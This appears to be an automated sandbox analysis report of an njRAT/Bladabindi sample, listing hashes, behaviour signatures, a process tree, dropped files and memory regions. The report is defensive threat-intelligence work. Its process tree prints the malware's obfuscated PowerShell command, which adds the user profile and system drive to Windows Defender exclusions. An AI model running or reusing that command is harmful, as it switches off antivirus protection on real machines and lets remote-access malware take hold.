Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    31/10/2023, 02:51

General

  • Target

    4d3583917fb1f539f92f945f0f298b2c1766ac27086275600eab721b8e9fbd90.exe

  • Size

    10.3MB

  • MD5

    b739c3eba37aa9999fb2d15ab5b9c680

  • SHA1

    bb18cc561805efa38545310057bcae4e894d3817

  • SHA256

    4d3583917fb1f539f92f945f0f298b2c1766ac27086275600eab721b8e9fbd90

  • SHA512

    0259b599a7e37426383184110aa828d0797875bab1925186b5b0ca0cb99ed2ae2bceb31f5c83ca3a8ba890bf86bb8cfa75f58d80db3b4ae710828f8ffb36c1ea

  • SSDEEP

    196608:56wcPit+w7T+yuSLoGUpTKQ8LY+TRQf3goX3yCJdpHt:5jSKd/+yuQoGUlQepyCJ

Score
10/10

Malware Config

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\4d3583917fb1f539f92f945f0f298b2c1766ac27086275600eab721b8e9fbd90.exe
    "C:\Users\Admin\AppData\Local\Temp\4d3583917fb1f539f92f945f0f298b2c1766ac27086275600eab721b8e9fbd90.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAbQByACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAZwBqACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAaQBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAbABqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944
    • C:\Users\Admin\AppData\Local\Temp\Server.exe
      "C:\Users\Admin\AppData\Local\Temp\Server.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      PID:2160
    • C:\Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe
      "C:\Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe"
      2⤵
      • Executes dropped EXE
      PID:2660

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Cab4A7A.tmp

          Filesize

          61KB

          MD5

          f3441b8572aae8801c04f3060b550443

          SHA1

          4ef0a35436125d6821831ef36c28ffaf196cda15

          SHA256

          6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

          SHA512

          5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

        • C:\Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe

          Filesize

          10.2MB

          MD5

          8564d4fe3d42c677cef18279c011e18f

          SHA1

          9fc9e7f8aec865864eb65d2fa056fb52a8554fab

          SHA256

          2e4ffaed48821bdee7f5fb6bd0d0b5b7231145e40c15d4875aaab01b81dd7fc5

          SHA512

          4ab42cd004255a59cd7e59703af82fe88f293183631179a16624895f48252b0b4f675844ed9615bc3db9a012ea5530366319a6ad8b0cbdeafa758236c9fbd4e0

        • C:\Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe

          Filesize

          10.2MB

          MD5

          8564d4fe3d42c677cef18279c011e18f

          SHA1

          9fc9e7f8aec865864eb65d2fa056fb52a8554fab

          SHA256

          2e4ffaed48821bdee7f5fb6bd0d0b5b7231145e40c15d4875aaab01b81dd7fc5

          SHA512

          4ab42cd004255a59cd7e59703af82fe88f293183631179a16624895f48252b0b4f675844ed9615bc3db9a012ea5530366319a6ad8b0cbdeafa758236c9fbd4e0

        • C:\Users\Admin\AppData\Local\Temp\Server.exe

          Filesize

          36KB

          MD5

          4e6d2de28a77f3e0b709aafe50346ab2

          SHA1

          c4b9ebe731dd45a9d5334b86021565075a0cf13f

          SHA256

          9bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb

          SHA512

          71d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a

        • C:\Users\Admin\AppData\Local\Temp\Server.exe

          Filesize

          36KB

          MD5

          4e6d2de28a77f3e0b709aafe50346ab2

          SHA1

          c4b9ebe731dd45a9d5334b86021565075a0cf13f

          SHA256

          9bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb

          SHA512

          71d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a

        • C:\Users\Admin\AppData\Local\Temp\Server.exe

          Filesize

          36KB

          MD5

          4e6d2de28a77f3e0b709aafe50346ab2

          SHA1

          c4b9ebe731dd45a9d5334b86021565075a0cf13f

          SHA256

          9bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb

          SHA512

          71d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a

        • C:\Users\Admin\AppData\Local\Temp\Tar4AEA.tmp

          Filesize

          163KB

          MD5

          9441737383d21192400eca82fda910ec

          SHA1

          725e0d606a4fc9ba44aa8ffde65bed15e65367e4

          SHA256

          bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

          SHA512

          7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

        • \Users\Admin\AppData\Local\Temp\Global Ultra Loade PB [2023].exe

          Filesize

          10.2MB

          MD5

          8564d4fe3d42c677cef18279c011e18f

          SHA1

          9fc9e7f8aec865864eb65d2fa056fb52a8554fab

          SHA256

          2e4ffaed48821bdee7f5fb6bd0d0b5b7231145e40c15d4875aaab01b81dd7fc5

          SHA512

          4ab42cd004255a59cd7e59703af82fe88f293183631179a16624895f48252b0b4f675844ed9615bc3db9a012ea5530366319a6ad8b0cbdeafa758236c9fbd4e0

        • \Users\Admin\AppData\Local\Temp\Server.exe

          Filesize

          36KB

          MD5

          4e6d2de28a77f3e0b709aafe50346ab2

          SHA1

          c4b9ebe731dd45a9d5334b86021565075a0cf13f

          SHA256

          9bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb

          SHA512

          71d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a

        • \Users\Admin\AppData\Local\Temp\Server.exe

          Filesize

          36KB

          MD5

          4e6d2de28a77f3e0b709aafe50346ab2

          SHA1

          c4b9ebe731dd45a9d5334b86021565075a0cf13f

          SHA256

          9bfaa2fd0df9bdfa594d582f8500393ee99de7acb0a24816677745529c425ceb

          SHA512

          71d5eb4e106963e46ddfcdc7a3fa3933aa2727b4d5d1a4244600e08bf435b055c7f85effa23b35d2942d1baf8a4a759a94d69ffb409fb7b7dfc1473dca949c3a

        • memory/2160-25-0x0000000001F90000-0x0000000001FD0000-memory.dmp

          Filesize

          256KB

        • memory/2160-22-0x0000000074AC0000-0x000000007506B000-memory.dmp

          Filesize

          5.7MB

        • memory/2160-66-0x0000000074AC0000-0x000000007506B000-memory.dmp

          Filesize

          5.7MB

        • memory/2160-65-0x0000000074AC0000-0x000000007506B000-memory.dmp

          Filesize

          5.7MB

        • memory/2160-21-0x0000000074AC0000-0x000000007506B000-memory.dmp

          Filesize

          5.7MB

        • memory/2660-16-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

          Filesize

          9.6MB

        • memory/2660-27-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2660-17-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2660-18-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

          Filesize

          9.6MB

        • memory/2660-63-0x000007FEF60B0000-0x000007FEF6A4D000-memory.dmp

          Filesize

          9.6MB

        • memory/2660-64-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/2944-26-0x00000000025A0000-0x00000000025E0000-memory.dmp

          Filesize

          256KB

        • memory/2944-62-0x0000000074AC0000-0x000000007506B000-memory.dmp

          Filesize

          5.7MB

        • memory/2944-23-0x0000000074AC0000-0x000000007506B000-memory.dmp

          Filesize

          5.7MB

        • memory/2944-24-0x00000000025A0000-0x00000000025E0000-memory.dmp

          Filesize

          256KB